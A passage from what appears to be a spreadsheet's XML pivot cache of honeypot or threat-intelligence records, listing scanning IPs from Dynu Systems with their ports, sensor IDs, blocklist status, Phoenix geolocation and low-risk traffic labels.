    <s v="SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H41"/>
    <s v="5900&amp;&amp;55708&amp;&amp;53189&amp;&amp;60001&amp;&amp;53083&amp;&amp;59336&amp;&amp;54397&amp;&amp;54990&amp;&amp;65154&amp;&amp;58825&amp;&amp;52976&amp;&amp;50356&amp;&amp;53722&amp;&amp;60251&amp;&amp;57617"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:ac51:3eec"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="386"/>
    <x v="386"/>
    <s v="NA&amp;&amp;unassigned.172-81-62-78.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T18:28:27"/>
    <d v="2024-11-23T04:15:49"/>
    <d v="2025-04-29T18:28:27"/>
    <n v="395"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H10"/>
    <s v="5900&amp;&amp;64575&amp;&amp;51217&amp;&amp;62762&amp;&amp;65206&amp;&amp;61729&amp;&amp;54986&amp;&amp;54706&amp;&amp;60644&amp;&amp;54181&amp;&amp;52035"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3e4e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="387"/>
    <x v="387"/>
    <s v="unassigned.172-81-62-198.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:28:20"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T18:28:20"/>
    <n v="418"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_DNS_H35&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_VNC_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;8342&amp;&amp;53428&amp;&amp;61413&amp;&amp;60028&amp;&amp;50038&amp;&amp;58816&amp;&amp;52014&amp;&amp;51300&amp;&amp;53877&amp;&amp;59417&amp;&amp;65153&amp;&amp;64347"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ec6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="388"/>
    <x v="388"/>
    <s v="unassigned.172-81-62-216.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:28:17"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T18:28:17"/>
    <n v="413"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;30202&amp;&amp;5900&amp;&amp;59304&amp;&amp;49415&amp;&amp;56897&amp;&amp;62125&amp;&amp;58124&amp;&amp;60577&amp;&amp;50981&amp;&amp;65438&amp;&amp;59219"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ed8"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="389"/>
    <x v="389"/>
    <s v="NA&amp;&amp;unassigned.172-81-62-119.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T18:28:00"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T18:28:00"/>
    <n v="469"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_DHCP_H17&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;25968&amp;&amp;61524&amp;&amp;67&amp;&amp;15872&amp;&amp;59021&amp;&amp;50913&amp;&amp;59754&amp;&amp;64296&amp;&amp;52451&amp;&amp;57223&amp;&amp;60670&amp;&amp;63915&amp;&amp;56988"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3e77"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="390"/>
    <x v="390"/>
    <s v="NA&amp;&amp;unassigned.172-81-62-230.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T18:27:59"/>
    <d v="2024-11-23T04:41:15"/>
    <d v="2025-04-29T18:27:59"/>
    <n v="318"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_VNC_H11"/>
    <s v="5900&amp;&amp;55071&amp;&amp;56309&amp;&amp;61820&amp;&amp;52126&amp;&amp;50694&amp;&amp;62642&amp;&amp;58656&amp;&amp;60959"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ee6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="391"/>
    <x v="391"/>
    <s v="NA&amp;&amp;unassigned.162-216-241-32.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T18:26:24"/>
    <d v="2024-11-23T03:36:57"/>
    <d v="2025-04-29T18:26:24"/>
    <n v="396"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H38"/>
    <s v="57380&amp;&amp;5900&amp;&amp;64255&amp;&amp;55289&amp;&amp;63859&amp;&amp;55183&amp;&amp;56673&amp;&amp;62051"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2019-01-11"/>
    <s v="DYNU"/>
    <s v="2019-10-26"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a2d8:f120"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="392"/>
    <x v="392"/>
    <s v="unassigned.172-81-62-180.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:24:39"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T18:24:39"/>
    <n v="458"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_DNS_H21&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;33898&amp;&amp;63301&amp;&amp;54313&amp;&amp;65489&amp;&amp;55658&amp;&amp;56785&amp;&amp;55090&amp;&amp;59388&amp;&amp;49378&amp;&amp;58622&amp;&amp;61226"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3eb4"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="393"/>
    <x v="393"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:14:33"/>
    <d v="2023-11-30T13:51:03"/>
    <d v="2025-04-29T18:14:33"/>
    <n v="867"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;SIP Endpoint Enumeration"/>
    <s v="low"/>
